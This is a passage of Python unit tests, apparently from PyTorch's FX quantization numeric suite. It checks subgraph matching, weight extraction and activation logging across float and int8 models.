mq = convert_fx(mp_copy)
results = get_matching_subgraph_pairs(mp, mq)
self.assertTrue(len(results) == 2)
results_iter = iter(results.items())
_, (subgraph_a_0, subgraph_b_0) = next(results_iter)
self.assertTrue(subgraph_a_0.start_node.name == '_0' and
subgraph_b_0.start_node.name == '_0')
_, (subgraph_a_1, subgraph_b_1) = next(results_iter)
self.assertTrue(subgraph_a_1.start_node.name == '_1' and
subgraph_b_1.start_node.name == '_1')
class TestFXGraphMatcherModels(QuantizationTestCase):
@skipIfNoFBGEMM
@skip_if_no_torchvision
def test_mobilenet_v2(self):
# verify that mobilenetv2 graph is able to be matched
import torchvision
m = torchvision.models.__dict__['mobilenet_v2'](pretrained=False).eval().float()
mp = prepare_fx(copy.deepcopy(m), {'': torch.ao.quantization.default_qconfig})
# assume success if no exceptions
results_m_mp = get_matching_subgraph_pairs(torch.fx.symbolic_trace(m), mp)
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
# assume success if no exceptions
results_mp_mq = get_matching_subgraph_pairs(mp, mq)
@skipIfNoFBGEMM
@skip_if_no_torchvision
def test_mobilenet_v2_qat(self):
# verify that mobilenetv2 graph is able to be matched
import torchvision
m = torchvision.models.__dict__['mobilenet_v2'](pretrained=False).float()
mp = prepare_qat_fx(
copy.deepcopy(m),
{'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')})
# assume success if no exceptions
results_m_mp = get_matching_subgraph_pairs(torch.fx.symbolic_trace(m), mp)
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
# assume success if no exceptions
results_mp_mq = get_matching_subgraph_pairs(mp, mq)
class FXNumericSuiteQuantizationTestCase(QuantizationTestCase):
def _test_extract_weights(
self, m, results_len=0, qconfig_dict=None, prepare_fn=prepare_fx
):
m = torch.fx.symbolic_trace(m)
if qconfig_dict is None:
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = prepare_fn(copy.deepcopy(m), qconfig_dict)
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
# test both the public API as well as the internal GraphModule API
for extract_weights_fun in (extract_weights, _extract_weights_impl):
# test both m vs mp and mp vs mq
for m1, m2 in ((m, mp), (mp, mq)):
results = extract_weights_fun('a', m1, 'b', m2)
self.assertTrue(
len(results) == results_len,
f"expected len {results_len}, got len {len(results)}")
self.assert_ns_compare_dict_valid(results)
extend_logger_results_with_comparison(
results, 'a', 'b', compute_sqnr, 'sqnr')
extend_logger_results_with_comparison(
results, 'a', 'b', compute_normalized_l2_error, 'l2_error')
extend_logger_results_with_comparison(
results, 'a', 'b', compute_cosine_similarity,
'cosine_similarity')
def _test_match_activations(
self, m, data, prepared_expected_node_occurrence=None, results_len=0,
should_log_inputs=False,
qconfig_dict=None,
skip_scripting=False,
prepare_fn=prepare_fx,
):
if qconfig_dict is None:
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
if prepare_fn == prepare_fx:
m.eval()
else:
m.train()
mp = prepare_fn(copy.deepcopy(m), qconfig_dict)
mp(*data)
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
m_ns, mp_ns2 = add_loggers(
'a', m, 'b', copy.deepcopy(mp), OutputLogger,
should_log_inputs=should_log_inputs)
mp_ns, mq_ns = add_loggers(
'a', mp, 'b', mq, OutputLogger,
should_log_inputs=should_log_inputs)
if prepared_expected_node_occurrence:
self.checkGraphModuleNodes(
m_ns, expected_node_occurrence=prepared_expected_node_occurrence)
self.checkGraphModuleNodes(
mp_ns2, expected_node_occurrence=prepared_expected_node_occurrence)
self.checkGraphModuleNodes(
mp_ns, expected_node_occurrence=prepared_expected_node_occurrence)
self.checkGraphModuleNodes(
mq_ns, expected_node_occurrence=prepared_expected_node_occurrence)
if not skip_scripting:
m_ns = torch.jit.script(m_ns)
mp_ns = torch.jit.script(mp_ns)
mq_ns = torch.jit.script(mq_ns)
# calibrate
m_ns(*data)
mp_ns2(*data)
mp_ns(*data)
mq_ns(*data)
# check activation result correctness
results = []
for m1, m2 in ((m_ns, mp_ns2), (mp_ns, mq_ns)):
act_compare_dict = extract_logger_info(
m1, m2, OutputLogger, 'b')
self.assertTrue(
len(act_compare_dict) == results_len,
f"expected len {results_len}, got len {len(act_compare_dict)}")
self.assert_ns_compare_dict_valid(act_compare_dict)
extend_logger_results_with_comparison(
act_compare_dict, 'a', 'b', compute_sqnr, 'sqnr')
extend_logger_results_with_comparison(
act_compare_dict, 'a', 'b', compute_normalized_l2_error, 'l2_error')
extend_logger_results_with_comparison(
act_compare_dict, 'a', 'b', compute_cosine_similarity,
'cosine_similarity')
results.append(act_compare_dict)
return results
def _test_match_shadow_activations(
self, m, data, prepared_expected_node_occurrence=None, results_len=None,
should_log_inputs=False, qconfig_dict=None, skip_scripting=False,
prepare_fn=prepare_fx, compare_fp32_vs_fp32_prepared=True,
):
if qconfig_dict is None:
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
if prepare_fn == prepare_fx:
m.eval()
else:
m.train()
mp = prepare_fn(copy.deepcopy(m), qconfig_dict)
mp(*data)
mp_copy = copy.deepcopy(mp)
mq = convert_fx(mp_copy)
if compare_fp32_vs_fp32_prepared:
m_shadows_mp = add_shadow_loggers(
'a', copy.deepcopy(m), 'b', copy.deepcopy(mp),
OutputLogger, should_log_inputs=should_log_inputs)
mp_shadows_mq = add_shadow_loggers(
'a', mp, 'b', mq, OutputLogger,
should_log_inputs=should_log_inputs)
if prepared_expected_node_occurrence:
if compare_fp32_vs_fp32_prepared:
self.checkGraphModuleNodes(
m_shadows_mp, expected_node_occurrence=prepared_expected_node_occurrence)
self.checkGraphModuleNodes(
mp_shadows_mq, expected_node_occurrence=prepared_expected_node_occurrence)
if not skip_scripting:
if compare_fp32_vs_fp32_prepared:
m_shadows_mp = torch.jit.script(m_shadows_mp)
mp_shadows_mq = torch.jit.script(mp_shadows_mq)
# calibrate
if compare_fp32_vs_fp32_prepared:
m_shadows_mp(*data)
mp_shadows_mq(*data)
# check activation result correctness
results = []
models = (m_shadows_mp, mp_shadows_mq) if \
compare_fp32_vs_fp32_prepared else (mp_shadows_mq,)
for model in models:
act_compare_dict = extract_shadow_logger_info(
model, OutputLogger, 'b')
if results_len is not None:
self.assertTrue(
len(act_compare_dict) == results_len,
f"expected len {results_len}, got len {len(act_compare_dict)}")
self.assert_ns_compare_dict_valid(act_compare_dict)
extend_logger_results_with_comparison(
act_compare_dict, 'a', 'b', compute_sqnr, 'sqnr')
extend_logger_results_with_comparison(
act_compare_dict, 'a', 'b', compute_normalized_l2_error, 'l2_error')
extend_logger_results_with_comparison(
act_compare_dict, 'a', 'b', compute_cosine_similarity,
'cosine_similarity')
results.append(act_compare_dict)
return results
class TestFXNumericSuiteCoreAPIs(FXNumericSuiteQuantizationTestCase):
@skipIfNoFBGEMM
def test_extract_weights_mod_ptq(self):
m = AllConvAndLinearFusionModules().eval()
self._test_extract_weights(m, results_len=14)
@skipIfNoFBGEMM
def test_extract_weights_mod_qat(self):
m = AllConvAndLinearFusionModules().train()
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
self._test_extract_weights(
m, results_len=14, qconfig_dict=qconfig_dict, prepare_fn=prepare_qat_fx)
@skipIfNoFBGEMM
def test_extract_weights_linear_fun_ptq(self):
m = LinearReluLinearFunctional().eval()
self._test_extract_weights(m, results_len=2)
@skipIfNoFBGEMM
def test_extract_weights_linear_fun_qat(self):
m = LinearReluLinearFunctional().train()
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
self._test_extract_weights(
m, results_len=2, qconfig_dict=qconfig_dict, prepare_fn=prepare_qat_fx)
@skipIfNoFBGEMM
def test_extract_weights_conv_fun_ptq(self):
w1d = torch.randn(1, 1, 1)
w2d = torch.randn(1, 1, 1, 1)
w3d = torch.randn(1, 1, 1, 1, 1)
b1d = torch.randn(1)
b2d = torch.randn(1)
b3d = torch.randn(1)
m = AllConvFunctional(w1d, w2d, w3d, b1d, b2d, b3d).eval()
self._test_extract_weights(m, results_len=6)
@skipIfNoFBGEMM
def test_extract_weights_conv_fun_qat(self):
w1d = torch.randn(1, 1, 1)
w2d = torch.randn(1, 1, 1, 1)
w3d = torch.randn(1, 1, 1, 1, 1)
b1d = torch.randn(1)
b2d = torch.randn(1)
b3d = torch.randn(1)
m = AllConvFunctional(w1d, w2d, w3d, b1d, b2d, b3d).train()
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
self._test_extract_weights(
m, results_len=6, qconfig_dict=qconfig_dict, prepare_fn=prepare_qat_fx)
@skipIfNoFBGEMM
def test_extract_weights_dynamic(self):
# TODO(future PR): add Linear-ReLU, after #55393 is fixed.
m = nn.Sequential(nn.Linear(1, 1)).eval()
qconfig_dict = {
'object_type': [
(nn.Linear, default_dynamic_qconfig),
],
}
self._test_extract_weights(m, results_len=1, qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
def test_extract_weights_fqn(self):
m = nn.Sequential(
nn.Sequential(nn.Conv2d(1, 1, 1)),
nn.Conv2d(1, 1, 1),
).eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = prepare_fx(m, qconfig_dict)
mq = convert_fx(copy.deepcopy(mp))
results = extract_weights('a', mp, 'b', mq)
fqn_a_0 = results['_0_0']['weight']['a'][0]['fqn']
fqn_b_0 = results['_0_0']['weight']['b'][0]['fqn']
self.assertTrue(fqn_a_0 == '0.0' and fqn_a_0 == fqn_b_0)
fqn_a_1 = results['_1']['weight']['a'][0]['fqn']
fqn_b_1 = results['_1']['weight']['b'][0]['fqn']
self.assertTrue(fqn_a_1 == '1' and fqn_a_1 == fqn_b_1)
def _test_match_activations_mod_impl(self, prepare_fn=prepare_fx):
m = nn.Sequential(
torch.ao.quantization.QuantStub(),
nn.Conv2d(1, 1, 1),
nn.Conv2d(1, 1, 1),
).eval()
qconfig_dict = None
if prepare_fn == prepare_qat_fx:
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
expected_occurrence = {
ns.call_module(OutputLogger): 2,
}
self._test_match_activations(
m, (torch.randn(2, 1, 2, 2),),
prepared_expected_node_occurrence=expected_occurrence,
results_len=2, qconfig_dict=qconfig_dict, prepare_fn=prepare_fn)
@skipIfNoFBGEMM
def test_match_activations_mod_ptq(self):
self._test_match_activations_mod_impl(prepare_fn=prepare_fx)
@skipIfNoFBGEMM
def test_match_activations_mod_qat(self):
self._test_match_activations_mod_impl(prepare_fn=prepare_qat_fx)
def _test_match_activations_fun_impl(self, prepare_fn=prepare_fx):
m = LinearReluLinearFunctional().eval()
qconfig_dict = None
if prepare_fn == prepare_qat_fx:
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
expected_occurrence = {
ns.call_module(OutputLogger): 2,
}
self._test_match_activations(
m, (torch.randn(4, 4),),
prepared_expected_node_occurrence=expected_occurrence,
results_len=2, prepare_fn=prepare_fn, qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
def test_match_activations_fun_ptq(self):
self._test_match_activations_fun_impl(prepare_fn=prepare_fx)
@skipIfNoFBGEMM
def test_match_activations_fun_qat(self):
self._test_match_activations_fun_impl(prepare_fn=prepare_qat_fx)
@skipIfNoFBGEMM
def test_match_activations_meth_ptq(self):
"""
Verify that add_loggers works on methods
"""
class M(nn.Module):
def forward(self, x):
x = x.sigmoid()
return x
m = M().eval()
res = self._test_match_activations(
m, (torch.randn(4, 4),),
results_len=1)
@skipIfNoFBGEMM
def test_match_activations_fqn(self):
m = nn.Sequential(
nn.Sequential(nn.Conv2d(1, 1, 1)),
nn.Conv2d(1, 1, 1),
).eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = prepare_fx(m, qconfig_dict)
mq = convert_fx(copy.deepcopy(mp))
mp_ns, mq_ns = add_loggers('a', mp, 'b', mq, OutputLogger)
datum = torch.randn(1, 1, 1, 1)
mp_ns(datum)
mq_ns(datum)
results = extract_logger_info(mp_ns, mq_ns, OutputLogger, 'b')
fqn_a_0 = results['_0_0']['node_output']['a'][0]['fqn']
fqn_b_0 = results['_0_0']['node_output']['b'][0]['fqn']
self.assertTrue(fqn_a_0 == '0.0' and fqn_a_0 == fqn_b_0)
fqn_a_1 = results['_1']['node_output']['a'][0]['fqn']
fqn_b_1 = results['_1']['node_output']['b'][0]['fqn']
self.assertTrue(fqn_a_1 == '1' and fqn_a_1 == fqn_b_1)
def _test_add_shadow_loggers_mod_impl(self, prepare_fn=prepare_fx):
m = nn.Sequential(
nn.Conv2d(1, 1, 1),
nn.Conv2d(1, 1, 1),
).eval()
qconfig_dict = None
if prepare_fn == prepare_qat_fx:
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
res = self._test_match_shadow_activations(
m, (torch.randn(1, 1, 4, 4),), results_len=2,
prepare_fn=prepare_fn, qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
@unittest.skip("Broken by https://github.com/pytorch/pytorch/pull/62608, enable after"
"dtype inference is supported")
def test_add_shadow_loggers_mod_ptq(self):
self._test_add_shadow_loggers_mod_impl(prepare_fn=prepare_fx)
@skipIfNoFBGEMM
def test_add_shadow_loggers_mod_qat(self):
self._test_add_shadow_loggers_mod_impl(prepare_fn=prepare_qat_fx)
def _test_add_shadow_loggers_fun_impl(self, prepare_fn=prepare_fx):
m = LinearReluLinearFunctional()
qconfig_dict = None
if prepare_fn == prepare_qat_fx:
qconfig_dict = {'': torch.ao.quantization.get_default_qat_qconfig('fbgemm')}
res = self._test_match_shadow_activations(
m, (torch.randn(4, 4),), results_len=2, prepare_fn=prepare_fn,
qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
def test_add_shadow_loggers_fun_ptq(self):
self._test_add_shadow_loggers_fun_impl(prepare_fn=prepare_fx)
@skipIfNoFBGEMM
def test_add_shadow_loggers_fun_qat(self):
self._test_add_shadow_loggers_fun_impl(prepare_fn=prepare_qat_fx)
@skipIfNoFBGEMM
@unittest.skip("Broken by https://github.com/pytorch/pytorch/pull/62608, enable after"
"dtype inference is supported")
def test_add_shadow_loggers_meth_ptq(self):
"""
Verify that add_loggers works on methods
"""
class M(nn.Module):
def forward(self, x):
x = x.sigmoid()
return x
m = M().eval()
res = self._test_match_shadow_activations(
m, (torch.randn(4, 4),),
results_len=1)
@skipIfNoFBGEMM
def test_add_shadow_loggers_multiple_dtype_casts(self):
"""
Verifies that for nodes where the first input arg is a list,
such as `cat`, we insert an individual dtype cast for each
arg of the list.
"""
class M(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
x = torch.cat([x, x, x], dim=0)
return x
m = M().eval()
expected_occurrence = {
# 3 dequantize function calls from the 3 dtype casts for [x, x, x]
ns.call_module(torch.nn.Identity): 3,
# 1 dequantize method call for module output
ns.call_method("dequantize"): 1,
}
self._test_match_shadow_activations(
m, (torch.randn(4, 4),),
prepared_expected_node_occurrence=expected_occurrence,
results_len=1, compare_fp32_vs_fp32_prepared=False)
@skipIfNoFBGEMM
def test_shadow_activations_fqn(self):
m = nn.Sequential(
nn.Sequential(nn.Conv2d(1, 1, 1)),
nn.Conv2d(1, 1, 1),
).eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = prepare_fx(m, qconfig_dict)
mq = convert_fx(copy.deepcopy(mp))
mp_shadows_mq = add_shadow_loggers('a', mp, 'b', mq, OutputLogger)
datum = torch.randn(1, 1, 1, 1)
mp_shadows_mq(datum)
results = extract_shadow_logger_info(mp_shadows_mq, OutputLogger, 'b')
fqn_a_0 = results['_0_0']['node_output']['a'][0]['fqn']
fqn_b_0 = results['_0_0']['node_output']['b'][0]['fqn']
self.assertTrue(fqn_a_0 == '0.0' and fqn_a_0 == fqn_b_0)
fqn_a_1 = results['_1']['node_output']['a'][0]['fqn']
fqn_b_1 = results['_1']['node_output']['b'][0]['fqn']
self.assertTrue(fqn_a_1 == '1' and fqn_a_1 == fqn_b_1)
@skipIfNoFBGEMM
def test_logging_inputs(self):
"""
Verifies that logging inputs works correctly
"""
class M(nn.Module):
def __init__(self):
super().__init__()
self.conv = nn.Conv2d(1, 1, 1)
def forward(self, x):
x = self.conv(x)
x = torch.cat([x, x], dim=0)
return x
m = M().eval()
self._test_match_shadow_activations(
m, (torch.randn(1, 1, 4, 4),),
results_len=2,
should_log_inputs=True)
@skipIfNoFBGEMM
def test_ops_with_same_fp32_and_int8_signature(self):
"""
Verifies that we can match pairs of ops which have the same aten
signature for fp32 and int8 tensors.
"""
class M(nn.Module):
def __init__(self):
super().__init__()
self.max_pool_2d = nn.MaxPool2d(2)
def forward(self, x):
x = self.max_pool_2d(x)
x = F.relu(x)
return x
m = M().eval()
self._test_match_activations(
m, (torch.randn(1, 1, 2, 2),),
results_len=2)
@skipIfNoFBGEMM
def test_add_mul_inputs_activations(self):
m = AddMulFunctional().eval()
res = self._test_match_activations(
m, (torch.randn(2, 2), torch.randn(2, 2)),
results_len=6, should_log_inputs=True)
@skipIfNoFBGEMM
def test_linear_fp16_weights(self):
qconfig_dict = {'': torch.ao.quantization.float16_static_qconfig}
m = LinearReluFunctional().eval()
self._test_extract_weights(m, results_len=1, qconfig_dict=qconfig_dict)
@skipIfNoFBGEMM
def test_linear_fp16_activations(self):
for should_log_inputs in (True, False):
qconfig_dict = {'': torch.ao.quantization.float16_static_qconfig}
m = LinearReluFunctional().eval()
num_loggers = 2 if should_log_inputs else 1
expected_occurrence = {
ns.call_module(OutputLogger): num_loggers,
}
res = self._test_match_activations(
m, (torch.randn(4, 4),),
prepared_expected_node_occurrence=expected_occurrence,
results_len=1,
qconfig_dict=qconfig_dict,
should_log_inputs=should_log_inputs)
@skipIfNoFBGEMM
def test_linear_fp16_shadow_activations(self):
for should_log_inputs in (True, False):
qconfig_dict = {'': torch.ao.quantization.float16_static_qconfig}
m = LinearReluFunctional().eval()
num_loggers = 4 if should_log_inputs else 2
expected_occurrence = {
ns.call_module(OutputLogger): num_loggers,
}
res2 = self._test_match_shadow_activations(
m, (torch.randn(4, 4),),
prepared_expected_node_occurrence=expected_occurrence,
results_len=1,
qconfig_dict=qconfig_dict,
should_log_inputs=should_log_inputs)
@skipIfNoFBGEMM
def test_linear_fp16_vs_linear_fp16_shadow_activations(self):
m = LinearFunctional().eval()
qconfig_dict = {'': torch.ao.quantization.float16_static_qconfig}
mp = prepare_fx(m, qconfig_dict)
mq1 = convert_fx(copy.deepcopy(mp))
mq2 = convert_fx(copy.deepcopy(mp))
mq1_shadows_mq2 = _add_shadow_loggers_impl(
'a', mq1, 'b', mq2, OutputLogger, should_log_inputs=False)
mq1_shadows_mq2(torch.randn(4, 4))
act_compare_dict = extract_shadow_logger_info(
mq1_shadows_mq2, OutputLogger, 'b')
self.assertTrue(len(act_compare_dict) == 1)
self.assert_ns_compare_dict_valid(act_compare_dict)
@skipIfNoFBGEMM
@unittest.skip("TODO: broken by https://github.com/pytorch/pytorch/pull/61687, will enable later")
def test_op_with_either_fp32_or_int8_input(self):
"""
Verify that shadowing works with ops which accept either fp32 or
int8 inputs.
"""
class M(nn.Module):
def __init__(self):
super().__init__()
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(x)
x = F.relu(x)
return x
m = M()
res = self._test_match_shadow_activations(
m, (torch.randn(4, 4),),
results_len=2)
def _test_int8_shadows_int8_impl(self, m):
"""
Verify that shadowing works where both modules are int8
"""
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
mp = prepare_fx(m, qconfig_dict)
mp(torch.randn(4, 1, 4, 4))
mq1 = convert_fx(copy.deepcopy(mp))
mq2 = convert_fx(mp)
mq1_shadows_mq2 = add_shadow_loggers('a', mq1, 'b', mq2, OutputLogger)
mq1_shadows_mq2(torch.randn(4, 1, 4, 4))
act_compare_dict = extract_shadow_logger_info(
mq1_shadows_mq2, OutputLogger, 'b')
self.assertTrue(len(act_compare_dict) == 1)
self.assert_ns_compare_dict_valid(act_compare_dict)
@skipIfNoFBGEMM
def test_int8_shadows_int8_mod(self):
m = nn.Sequential(nn.Conv2d(1, 1, 1)).eval()
self._test_int8_shadows_int8_impl(m)
@skipIfNoFBGEMM
def test_int8_shadows_int8_fun(self):
m = LinearFunctional().eval()
self._test_int8_shadows_int8_impl(m)
@skipIfNoFBGEMM
def test_user_module_scriptable(self):
# Logging of the output of this class is not supported, because it is
# neither a tensor or an RNN return type.
class M1(nn.Module):
def forward(self, x):
x1 = x * 2
x2 = x * 4
return (x1, x2)
class M2(nn.Module):
def __init__(self):
super().__init__()
self.m1 = M1()
def forward(self, x):
x1, x2 = self.m1(x)
return x1, x2
m = M2().eval()
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
prepare_custom_config_dict = {
'non_traceable_module_class': [M1],
}
mp1 = prepare_fx(m, qconfig_dict, prepare_custom_config_dict)
mp2 = copy.deepcopy(mp1)
unmatchable_types_map = get_unmatchable_types_map()
unmatchable_types_map['mods_unmatchable'].add(M1)
mp1_ns, mp2_ns = _add_loggers_impl(
'a', mp1, 'b', mp2, OutputLogger, should_log_inputs=False,
unmatchable_types_map=unmatchable_types_map)
# Scripting a model with loggers should succeed. If it fails because of
# incorrect dtypes, we can blocklist the associated types from being instrumented.
mp1_ns_scripted = torch.jit.script(mp1_ns)
mp2_ns_scripted = torch.jit.script(mp2_ns)
@skipIfNoFBGEMM
def test_user_module(self):
"""
For user defined modules,
1. weight extraction should not crash
2. unshadowed activations should only have loggers for known types
3. shadowed activations should only have loggers for known types with
known dtypes
"""
class UserModule(nn.Module):
def forward(self, x):
return x
class M(nn.Module):
def __init__(self):
super().__init__()
self.linear = nn.Linear(1, 1)
self.user_module = UserModule()
def forward(self, x):
x = self.linear(x)
x = self.user_module(x)
return x
m = M().eval()
# quantize without tracing through UserModule
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
prepare_custom_config_dict = {'non_traceable_module_name': ['user_module']}
mp = prepare_fx(m, qconfig_dict, prepare_custom_config_dict)
mp(torch.randn(1, 1, 1))
mq = convert_fx(copy.deepcopy(mp))
# weight extraction should not crash
weights = _extract_weights_impl('fp32_prepared', mp, 'int8', mq)
# unshadowed activations should have loggers
# add loggers, without retracing
# note: converting again because we cannot copy a quantized linear
mp_ns, mq_ns = _add_loggers_impl(
'fp32_prepared', copy.deepcopy(mp), 'int8',
convert_fx(copy.deepcopy(mp)), OutputLogger,
should_log_inputs=True)
# both fp32 and int8 models should have 2 loggers each, 2 for I/O
# of linear, and 0 for I/O of user_module
unshadowed_expected_occurrence = {
ns.call_module(OutputLogger): 2,
}
self.checkGraphModuleNodes(
mp_ns, expected_node_occurrence=unshadowed_expected_occurrence)
self.checkGraphModuleNodes(
mq_ns, expected_node_occurrence=unshadowed_expected_occurrence)
# shadowed activations should only have loggers for nodes where
# the types are known and we can do a dtype cast
# add shadow loggers, without retracing
mp_shadows_mq_ns = _add_shadow_loggers_impl(
'fp32_prepared', mp, 'int8', mq, OutputLogger,
should_log_inputs=True)
# 4 loggers for I/O of linear, 0 loggers for I/O of user_module
shadowed_expected_occurrence = {
ns.call_module(OutputLogger): 4,
}
self.checkGraphModuleNodes(
mp_shadows_mq_ns, expected_node_occurrence=shadowed_expected_occurrence)
def test_op_io_dtype_coverage(self):
"""
Tests that all the ops quantization cares about have input and output
dtypes defined.
"""
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
type_a_related_to_b = \
get_type_a_related_to_b(base_name_to_sets_of_related_ops)
# TODO(future PR): clean this up
node_type_to_io_type_map = get_node_type_to_io_type_map()
FUNS_IO_TYPE_FP32 = node_type_to_io_type_map['funs_io_type_fp32']
FUNS_IO_TYPE_INT8 = node_type_to_io_type_map['funs_io_type_int8']
FUNS_IO_TYPE_FP32_OR_INT8 = node_type_to_io_type_map['funs_io_type_fp32_or_int8']
MODS_IO_TYPE_FP32 = node_type_to_io_type_map['mods_io_type_fp32']
MODS_IO_TYPE_INT8 = node_type_to_io_type_map['mods_io_type_int8']
MODS_IO_TYPE_FP32_OR_INT8 = node_type_to_io_type_map['mods_io_type_fp32_or_int8']
METHS_IO_TYPE_FP32_OR_INT8 = node_type_to_io_type_map['meths_io_type_fp32_or_int8']
unmatchable_types_map = get_unmatchable_types_map()
FUNS_UNMATCHABLE = unmatchable_types_map['funs_unmatchable']
MODS_UNMATCHABLE = unmatchable_types_map['mods_unmatchable']
METHS_UNMATCHABLE = unmatchable_types_map['meths_unmatchable']
# 1. check static quant module mappings
static_quant_mod_mappings = get_default_static_quant_module_mappings()
for fp32_type, int8_type in static_quant_mod_mappings.items():
types_to_skip = (
torch.ao.quantization.QuantStub,
torch.ao.quantization.DeQuantStub,
nnq.FloatFunctional,
# TODO(future PR): look into whether shadowing embeddings
# makes sense
nn.Embedding,
nn.EmbeddingBag,
)
if fp32_type in types_to_skip:
continue
self.assertTrue(
fp32_type in MODS_IO_TYPE_FP32,
f"missing IO type handling for f{fp32_type}")
self.assertTrue(
int8_type in MODS_IO_TYPE_INT8,
f"missing IO type handling for f{int8_type}")
# 2. check static quant op mappings
static_quant_fun_mappings = get_default_float_to_quantized_operator_mappings()
for fp32_type, int8_type in static_quant_fun_mappings.items():
self.assertTrue(
fp32_type in FUNS_IO_TYPE_FP32,
f"missing IO type handling for f{fp32_type}")
self.assertTrue(
int8_type in FUNS_IO_TYPE_INT8,
f"missing IO type handling for f{int8_type}")
# 3. check dynamic quant mappings
dynamic_quant_mappings = get_default_dynamic_quant_module_mappings()
for fp32_type1, fp32_type2 in dynamic_quant_mappings.items():
# TODO(future PR): verify correct I/O for these and remove from
# this list.
types_to_skip = (
nn.GRUCell,
nn.GRU,
nn.LSTMCell,
nn.RNNCell,
# TODO(future PR): look into whether shadowing embeddings
# makes sense
nn.Embedding,
nn.EmbeddingBag,
)
if fp32_type1 in types_to_skip:
continue
self.assertTrue(
fp32_type1 in MODS_IO_TYPE_FP32,
f"missing IO type handling for f{fp32_type1}")
self.assertTrue(
fp32_type2 in MODS_IO_TYPE_FP32,
f"missing IO type handling for f{fp32_type2}")
# 4. go through the ops mapped to each QuantizeHandler type, and verify
# correctness.
default_quant_patterns = get_default_quant_patterns()
for pattern, qhandler_cls in default_quant_patterns.items():
base_op = None
if isinstance(pattern, tuple):
base_op = pattern[-1]
elif isinstance(pattern, str):
base_op = pattern
else:
base_op = pattern
if (
qhandler_cls in (
qp.BinaryOpQuantizeHandler,
qp.RNNDynamicQuantizeHandler,
)
):
# TODO(future PR): implement shadowing for binary ops
# TODO(future PR): implement shadowing for RNN ops
continue
elif qhandler_cls == qp.CatQuantizeHandler:
self.assertTrue(
base_op in FUNS_IO_TYPE_FP32_OR_INT8,
f"missing IO type handling for {base_op}")
elif (
qhandler_cls in (
qp.ConvReluQuantizeHandler,
qp.LinearReLUQuantizeHandler,
qp.BatchNormQuantizeHandler,
qp.DefaultNodeQuantizeHandler,
)
):
self.assertTrue(
(base_op in FUNS_IO_TYPE_FP32) or (base_op in MODS_IO_TYPE_FP32),
f"missing IO type handling for {base_op}")
elif (
qhandler_cls in (
qp.FixedQParamsOpQuantizeHandler,
qp.CopyNodeQuantizeHandler,
qp.GeneralTensorShapeOpQuantizeHandler,
)
):
if (
base_op in FUNS_UNMATCHABLE or
base_op in MODS_UNMATCHABLE or
base_op in METHS_UNMATCHABLE
):
continue
self.assertTrue(
(base_op in FUNS_IO_TYPE_FP32_OR_INT8) or
(base_op in MODS_IO_TYPE_FP32_OR_INT8) or
(base_op in METHS_IO_TYPE_FP32_OR_INT8),
f"missing IO type handling for {base_op}")
elif qhandler_cls == qp.EmbeddingQuantizeHandler:
# embedding shadowing is not implemented, for now
continue
else:
raise AssertionError(
f"handing for {qhandler_cls} not implemented")
@skipIfNoFBGEMM
def test_user_defined_function(self):
"""
Verify that NS APIs work on user defined functions
"""
class M1(nn.Module):
def __init__(self):
super().__init__()
self.w1 = nn.Parameter(torch.empty(1, 1))
self.b1 = nn.Parameter(torch.zeros(1))
torch.nn.init.kaiming_uniform_(self.w1, a=math.sqrt(5))
def forward(self, x):
x = F.hardswish(x)
x = x.sigmoid()
x = F.linear(x, self.w1, self.b1)
return x
class M2(nn.Module):
def __init__(self):
super().__init__()
self.w1 = nn.Parameter(torch.empty(1, 1))
self.b1 = nn.Parameter(torch.zeros(1))
torch.nn.init.kaiming_uniform_(self.w1, a=math.sqrt(5))
def forward(self, x):
x = _wrapped_hardswish(x)
x = _wrapped_sigmoid(x)
x = _wrapped_linear(x, self.w1, self.b1)
return x
qconfig_dict = {'': torch.ao.quantization.default_qconfig}
m1 = prepare_fx(M1().eval(), qconfig_dict)
m2 = prepare_fx(M2().eval(), qconfig_dict)
data = torch.randn(1, 1)
base_name_to_sets_of_related_ops = get_base_name_to_sets_of_related_ops()
add_op_to_sets_of_related_ops(
base_name_to_sets_of_related_ops, _wrapped_hardswish, F.hardswish)
add_op_to_sets_of_related_ops(
base_name_to_sets_of_related_ops, _wrapped_sigmoid, F.sigmoid)
add_op_to_sets_of_related_ops(
base_name_to_sets_of_related_ops, _wrapped_linear, F.linear)
op_to_type_to_weight_extraction_fn = \
get_op_to_type_to_weight_extraction_fn()
op_to_type_to_weight_extraction_fn['call_function'][_wrapped_linear] = \
torch.ao.ns.fx.weight_utils.get_linear_fun_weight
# test compare weights
results = extract_weights(
'a', m1, 'b', m2,
base_name_to_sets_of_related_ops=base_name_to_sets_of_related_ops,
op_to_type_to_weight_extraction_fn=op_to_type_to_weight_extraction_fn)
self.assertTrue(len(results) == 1)
self.assertTrue(len(results['_wrapped_linear']['weight']) == 2)
# test unshadowed activations
m1_ns, m2_ns = _add_loggers_impl(
'a', copy.deepcopy(m1), 'b', copy.deepcopy(m2), OutputLogger,
should_log_inputs=False,
